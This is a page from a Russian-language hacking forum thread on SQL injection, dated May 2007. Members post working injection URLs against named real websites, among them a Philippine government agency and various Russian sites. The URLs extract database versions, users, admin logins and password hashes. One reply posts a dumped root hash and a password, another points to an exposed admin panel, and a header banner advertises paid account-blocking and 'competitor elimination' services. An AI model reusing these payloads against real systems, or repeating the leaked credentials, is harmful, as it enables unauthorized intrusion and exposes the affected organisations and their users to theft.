УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 222 из 1242

222

Опции темы

Поиск в этой теме

Опции просмотра

#2211

16.05.2007, 19:00

-=lebed=-

Флудер

Регистрация: 21.06.2006

Сообщений: 3,193

Провел на форуме:
12702287

Репутация: 4738

Код:

http://www.apahelpcenter.org/articles/article.php?id=-123+union+select+1,version(),user(),4,5/*

P.S. заюзал антибоян только щас... скуля-боян.

Последний раз редактировалось -=lebed=-; 17.05.2007 в 09:11..

#2212

16.05.2007, 21:20

pento

Участник форума

Регистрация: 03.07.2006

Сообщений: 147

Провел на форуме:
438137

Репутация: 66

Department of Social Welfare and Development
DSWD Bldg., Constitution Hills, Batasan Complex, Q.C., Philippines

Код:

http://www.dswd.gov.ph/faqdetails.php?id=-1 union select 1,concat(user,CHAR(64),host,CHAR(58), password),3,4,5,6 from mysql.user/*

#2213

16.05.2007, 21:45

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

antigreen.ru

Цитата:

http://antigreen.org/index.php?index=-12+union+select+1,concat_ws(0x3a,user(),version(), database())/*

#2214

16.05.2007, 23:12

jmp_$-3

Новичок

Регистрация: 27.03.2006

Сообщений: 1

Провел на форуме:
4380

Репутация: 0

ХЭttp://tik.ru/pages/search.php?search=%27

Код:

TABLE_NAME:
tik_pages
tik_users

Код:

TABLE_STRUCT (tik_users):
1, 2, 3, pass, login, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18

Интересная игрушка

Дыры множественные в разных скриптах, в том числе межсайтовый скриптинг, инъекции.

sql-inj

#2215

16.05.2007, 23:45

~~Серенький~~

Banned

Регистрация: 13.04.2007

Сообщений: 123

Провел на форуме:
921520

Репутация: 572

sql-inj

Коррозия Металла

http://www.korroziametalla.com/
уязвимость: http://www.korroziametalla.com/news_arh.php?year=2007&id=49'
-> mysql 5
смотрим таблицы стандартными средствами пятой версии:

Цитата:

http://www.korroziametalla.com/news_arh.php?year=2007&id=-49+union+select+1,2,3,table_name,5+from+informatio n_schema.tables+limit+0,1/*

находим обращаем внимание на kor_forum и kor_admin. смотрим колонки аналогичным образом, потом смотрим в них и видим логин/пароль, пароль в незашифрованном виде

Цитата:

http://www.korroziametalla.com/news_arh.php?year=2007&id=-49+union+select+1,2,3,concat_ws(0x3a,id,login,pass word),5+from+kor_admin+limit+0,1/*

админка

Цитата:

http://www.korroziametalla.com/admin/

Последний раз редактировалось Серенький; 16.05.2007 в 23:47..

#2216

17.05.2007, 10:03

Muhacir

Участник форума

Регистрация: 05.10.2006

Сообщений: 133

Провел на форуме:
548338

Репутация: 165

Отправить сообщение для Muhacir с помощью ICQ

Цитата:

Сообщение от pento

Department of Social Welfare and Development
DSWD Bldg., Constitution Hills, Batasan Complex, Q.C., Philippines

Код:

http://www.dswd.gov.ph/faqdetails.php?id=-1 union select 1,concat(user,CHAR(64),host,CHAR(58), password),3,4,5,6 from mysql.user/*

root@localhost:299ce3c1618fe6e4

pass:zaq12345

#2217

17.05.2007, 12:01

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Код:

http://www.dubovoe.ru/print.php?news_id=-1+union+select+1,2,3,4,5,6,concat(database(),char(58),user(),char(58),version()),8,9,10,11,12,13,14,15/*

Код:

http://campus4.best-host.ru/index.php?news=-1+union+select+1,2,3,4,5/*

#2218

17.05.2007, 13:19

VampiRUS

Участник форума

Регистрация: 31.12.2005

Сообщений: 231

Провел на форуме:
1106266

Репутация: 366

Отправить сообщение для VampiRUS с помощью Yahoo

Цитата:

http://www.rosdiplom.ru/readyi2a1a2.asp?id=9966)+or+1=(SELECT+TOP+1+cast(U serName+as+nvarchar)%2B%27%3A%27%2Bcast(Password+a s+nvarchar)%2B%27%3A%27%2Bcast(id+as+nvarchar)+FRO M+%C0%E4%ec%e8%ed%e8%f1%f2%f0%e0%f2%ee%f0%fb)--

Админку найти несмог(, хеши это md5 урезаные до 30 символов, у первых 6 человек один и тот же пароль 123(ещё бы знать его куда воткнуть

), дальше несмотрел

#2219

17.05.2007, 15:14

p-range

Участник форума

Регистрация: 05.02.2006

Сообщений: 168

Провел на форуме:
749524

Репутация: 715

Отправить сообщение для p-range с помощью ICQ

Цитата:

http://boravet.com/yazi.php?id=-1+union+select+1,0x3C68313E2A425241564F2A3C2F68313 E,3,4/*

*BRAVO*

Цитата:

http://spbclub.ru/cgi-bin/group_news/view.pl?id=-1+union+select+1,aes_decrypt(aes_encrypt(concat(lo gin,0x3a,password),0x71),0x71),3,4+from+users+limi t+1,9000/*

красиво

p.s. дальше не копал. пользователей там много

mysql.user закрыт.

Последний раз редактировалось p-range; 17.05.2007 в 15:32..

#2220

17.05.2007, 16:54

ЛифчиС5СВ

Постоянный

Регистрация: 09.03.2007

Сообщений: 323

Провел на форуме:
1552920

Репутация: 369

http://doska.911.by

Код:

http://doska.911.by/full_info.php?sid=-1+union+select+1/*

Страница 222 из 1242

222

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход